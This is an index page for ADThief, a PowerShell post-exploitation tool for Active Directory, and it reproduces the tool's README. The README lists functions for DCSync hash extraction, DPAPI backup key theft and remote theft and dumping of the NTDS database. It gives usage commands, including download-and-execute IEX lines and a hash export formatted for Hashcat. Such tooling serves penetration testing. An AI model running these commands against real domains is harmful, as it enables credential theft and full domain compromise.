Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/tmenochet/ADThief

Post-exploitation tool for attacking Active Directory domain controllers
https://github.com/tmenochet/ADThief

Last synced: about 1 month ago
JSON representation

Post-exploitation tool for attacking Active Directory domain controllers

Host: GitHub
URL: https://github.com/tmenochet/ADThief
Owner: tmenochet
License: gpl-3.0
Created: 2020-01-04T18:27:22.000Z (over 4 years ago)
Default Branch: master
Last Pushed: 2022-12-18T15:44:34.000Z (over 1 year ago)
Last Synced: 2024-05-02T19:20:01.946Z (5 months ago)
Language: PowerShell
Homepage:
Size: 42 KB
Stars: 15
Watchers: 3
Forks: 3
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

awesome-hacking-lists - tmenochet/ADThief - Post-exploitation tool for attacking Active Directory domain controllers (PowerShell)

README

# ADThief

ADThief is a PowerShell tool to exploit Active Directory database after compromising a Windows domain.

## Functions

```
Invoke-DCSync - extracts domain accounts from Active Directory domain controller, including password hashes
Invoke-DirSync - extracts confidential and RODC filtered attributes from Active Directory domain controller
Get-DpapiBackupKey - extracts the DPAPI backup key from Active Directory domain controller
Get-ADDatabase - steals Active Directory database remotely
Dump-ADDatabase - dumps domain accounts from an offline Active Directory database, including password hashes
Mount-ADDatabase - mounts an Active Directory database as a local LDAP server
Get-LdapObject - searchs for domain objects in a mounted Active Directory database
```

## Requirements

The functions `Invoke-DCSync`, `Get-DpapiBackupKey`, `Invoke-DirSync` and `Get-ADDatabase` require a privileged access to Active Directory, typically domain admin rights.
The functions `Dump-ADDatabase` and `Mount-ADDatabase` require admin rights on the local computer.

The functions `Invoke-DCSync`, `Get-DpapiBackupKey` and `Dump-ADDatabase` must be launched on a computer with DSInternals PowerShell module installed. The output of these functions can be formatted using custom views provided by the DSInternals module to support different password cracking tools. The Utils.ps1 file contains a function `Add-DSAccountCustomViews` to add optional views 'SecretsDump' and 'SecretsDumpHistory'.

```
PS C:\> Install-Module DSInternals -Scope CurrentUser
PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/tmenochet/ADThief/master/Utils.ps1')
PS C:\> Add-DSAccountCustomViews
PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/tmenochet/ADThief/master/ADThief.ps1')
PS C:\> Invoke-DCSync -Server DC.ADATUM.CORP -Credential ADATUM\Administrator | Format-Custom -View SecretsDump
```

The function `Mount-ADDatabase` must be launched on a computer with AD LDS installed. Please make sure to back up the NTDS.DIT file before using the option 'AllowUpgrade'.

```
PS C:\> Enable-WindowsOptionalFeature -FeatureName "DirectoryServices-ADAM-Client" -Online
PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/tmenochet/ADThief/master/ADThief.ps1')
PS C:\> Get-ADDatabase -Server DC.ADATUM.CORP -Credential ADATUM\Administrator
PS C:\> Dump-ADDatabase | Format-Custom -View HashcatNT | Out-File -Encoding ascii ADATUM.hashes
PS C:\> Mount-ADDatabase -AllowUpgrade -LdapPort 1389
PS C:\> Get-LdapObject -Server localhost:1389 -SearchBase "dc=adatum,dc=corp" -Filter "(&(userAccountControl:1.2.840.113556.1.4.803:=65536)(!userAccountControl:1.2.840.113556.1.4.803:=2))" -Properties sAMAccountName,servicePrincipalName
PS C:\> Umount-ADDatabase
```

## Credits

* https://blog.netspi.com/getting-started-wmi-weaponization-part-4/
* https://github.com/MichaelGrafnetter/DSInternals
* https://simondotsh.com/infosec/2022/07/11/dirsync.html